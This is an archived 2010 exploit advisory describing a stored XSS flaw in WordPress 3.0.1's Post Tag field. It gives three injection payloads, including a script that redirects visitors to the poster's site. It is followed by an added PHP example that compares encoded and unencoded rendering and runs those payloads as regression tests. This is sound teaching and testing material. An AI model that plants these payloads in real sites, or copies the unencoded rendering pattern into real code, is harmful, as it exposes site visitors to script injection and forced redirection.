
Wordpress 3.0.1(Post Tag) XSS Vulnerability

Posted on 14 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Wordpress 3.0.1(Post Tag) XSS Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>
===========================================
Wordpress 3.0.1(Post Tag) XSS Vulnerability
===========================================

[+] Site           : Inj3ct0r.com
[+] Support e-mail : submit[at]inj3ct0r.com

I'm Sid3^effects member from Inj3ct0r Team

Name              : Wordpress 3.0.1(Post Tag) XSS Vulnerability
Date              : August, 14 2010
Vendor Url        : http://wordpress.org/
Critical Level    : Low
Author            : Sid3^effects aKa HaRi &lt;shell_c99[at]yahoo.com&gt;
Big hugs          : Th3 RDX
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr
greetz to         : www.topsecure.net ,trent Dillman,All ICW members and my friends :) luv y0 guyz

Happy Independence day to all Pakistani and Indians :D

#######################################################################################################

Xploit: XSS Vulnerability

Step 1 : Make a blog :)
Step 2 : Now go to http://urblog.wordpress.com/wp-admin/post-new.php
Step 3 : Insert XSS scripts in the &quot;POST TAG&quot; option.

Attack Patterns :

* &quot;&gt;&lt;iframe src=http://www.inj3ct0r.com width=&quot;500%&quot; height=&quot;500&quot; &gt;
* &quot;&gt;&lt;script&gt;alert(&quot;Inj3ct0r&quot;)&lt;/script&gt;
* &lt;script&gt;document.onload=location.href='http://www.inj3ct0r.com'&lt;/script&gt;

###############################################################################################################

NOTE : THIS ISSUE ISN'T SO CRITICAL BUT YEA IT DOES EXECUTE XSS SCRIPTS SINCE IT IS NOT PROPERLY SANITISED. AND AT THE SAME TIME IF YOU'RE TRYING TO INSERT SCRIPTS IN THE BELOW GIVEN URL :
http://URBLOG.wordpress.com/wp-admin/edit-tags.php?taxonomy=post_tag,
THE SCRIPTS DON'T GET EXECUTED SINCE THEY ARE PROPERLY SANITISED.

###############################################################################################################

ScreenshotS :

http://img401.imageshack.us/img401/225/14959664.png ---&gt; POPUP
http://img832.imageshack.us/img832/2923/iframe.png ---&gt; IFRAME

###############################################################################################################

# 0day no more
# Sid3^effects

# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-14]</pre></body></html>
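
The advisory's note contrasts one path where the Post Tag value is rendered unsanitised with another (edit-tags.php) where it is handled correctly. The PHP below is an added example, not code from the advisory or from WordPress core: it renders a tag name with and without output encoding and parses the result to list any elements the value managed to create. The function names are hypothetical, the template is an assumed one, and PHP's DOM extension is assumed to be available.

```php
<?php
// Added example. render_tag_unsafe/render_tag_safe are hypothetical helpers,
// not WordPress core functions; the <a> template is an assumption.

// Vulnerable pattern: the stored tag name goes into an attribute and into
// element text unencoded, so a leading "> closes the attribute and the tag.
function render_tag_unsafe(string $name): string {
    return '<a rel="tag" title="' . $name . '">' . $name . '</a>';
}

// Hardened pattern: encode for HTML at output time. ENT_QUOTES encodes both
// quote styles, so the value cannot leave the attribute it was placed in.
function render_tag_safe(string $name): string {
    $enc = htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a rel="tag" title="' . $enc . '">' . $enc . '</a>';
}

// Regression check: parse the markup and list every element other than the
// single <a> the template is supposed to produce.
function unexpected_elements(string $markup): array {
    $doc = new DOMDocument();
    $prev = libxml_use_internal_errors(true); // tolerate malformed markup
    $doc->loadHTML('<div>' . $markup . '</div>');
    libxml_clear_errors();
    libxml_use_internal_errors($prev);
    $found = [];
    foreach ($doc->getElementsByTagName('*') as $el) {
        if (!in_array($el->nodeName, ['html', 'body', 'div', 'a'], true)) {
            $found[] = $el->nodeName;
        }
    }
    return $found;
}

// The three tag values listed in the advisory, used as test input.
$samples = [
    '"><iframe src=http://www.inj3ct0r.com width="500%" height="500" >',
    '"><script>alert("Inj3ct0r")</script>',
    "<script>document.onload=location.href='http://www.inj3ct0r.com'</script>",
];

foreach ($samples as $s) {
    $unsafe = unexpected_elements(render_tag_unsafe($s));
    $safe   = unexpected_elements(render_tag_safe($s));
    printf("unsafe: [%s]  safe: [%s]\n", implode(',', $unsafe), implode(',', $safe));
    if ($safe !== []) {
        exit(1); // encoding failed to neutralise the value
    }
}
```

A check of this kind can sit in a theme or plugin test suite so that any template that echoes a taxonomy term without encoding fails the build.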

 
